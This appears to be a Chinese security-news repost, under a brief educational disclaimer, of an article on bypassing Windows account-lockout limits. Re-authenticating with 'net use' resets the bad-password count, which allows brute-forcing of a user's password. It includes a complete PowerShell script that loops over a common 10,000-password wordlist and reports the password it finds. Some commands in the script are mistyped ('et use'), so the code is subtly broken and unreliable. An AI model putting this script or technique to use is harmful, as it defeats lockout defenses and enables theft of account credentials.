*本文仅用于教育目的。 切勿在未授权的计算机上进行安全测试。
获取用户帐户密码有很多好方法,这只是另一种方式。 好的,让我们开始吧。核心思路是,用户想要爆破身份验证,他们就可以运行“net use \\%computername%/ u:%username%”命令,该命令可以重新要求身份验证并重置锁定计数。要想进行操作,您需要从Microsoft下载远程服务器管理工具安装该工具后,运行一小段powershell脚本以显示我的JoeUser帐户信息并锁定。
get-aduser -filter * -prop lastbadpasswordattempt, badpwdcount, lockedout | select name, lastbadpasswordattempt, badpwdcount,lockedout | format-table -auto
在我的本地策略中,您可以看到我在3次无效登录尝试后被锁定(我从Microsoft获得的默认安装值)。 
接下来我将输入错误的密码,window将记录我的错误次数。 
现在我将使用命令清除错误的密码尝试:“Net use \\%computername%/ u:%username%”注意我没有指定密码。 我已经以用户身份登录,它似乎使用当前用户的上下文进行身份验证,并清除了错误的密码计数! 
现在我可以使用这种技术爆破密码。 唯一的缺点是我必须在每次设置后删除共享。 例如,现在我已经进行了共享设置,如果我尝试爆破密码,我会收到此消息 
然而只需一条命令即可“Net Use /Delete \\%computername%” 
正式测试,我使用Daniel Miesslers SecLists的前10000名密码列表来爆破。正确的密码也在里面。
$userVar = Get-ChildItem env:username
$uname = $userVar.Value
$computerVar = Get-ChildItem env:computername
$computerName = $computerVar.Value
$ErrorActionPreference = "Stop"
$hooray = "PasswordNotFoun"
$CurrentPath = "C:\Users\Public"
$FileName = "10-million-password-list-top-10000.txt"
$FName= "$CurrentPath\$FileName"
foreach($value in [System.IO.File]::ReadLines($Fname))
{
$passAttempt = ('net use \\' + $computerName + ' "' + $value + '"' + '/u:' + $uname )
try
{
Write-Output ("trying password " + $value)
$output = Invoke-Expression $passAttempt | Out-Null
$hooray = $value
write-output ("FOUND the user password: " + $value)
$reset = ('et use \\' + $computername + ' /u:'+ $uname )
Invoke-Expression $reset | Out-Null
$deleteShare = ('net use /delete \\' + $computername )
Invoke-Expression $deleteShare | Out-Null
break
}
catch
{
$reset = ('et use \\' + $computername + '/u:' + $uname )
Invoke-Expression $reset | Out-Null
$deleteShare = ('et use /delete \\'+ $computername )
Invoke-Expression $deleteShare | Out-Null
}
}
write-host "The Password is: "$hooray
成功爆破
*参考来源:medium,FB小编周大涛编译,转载请注明来自FreeBuf.COM
来源:freebuf.com 2019-05-07 07:00:27 by: 周大涛
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册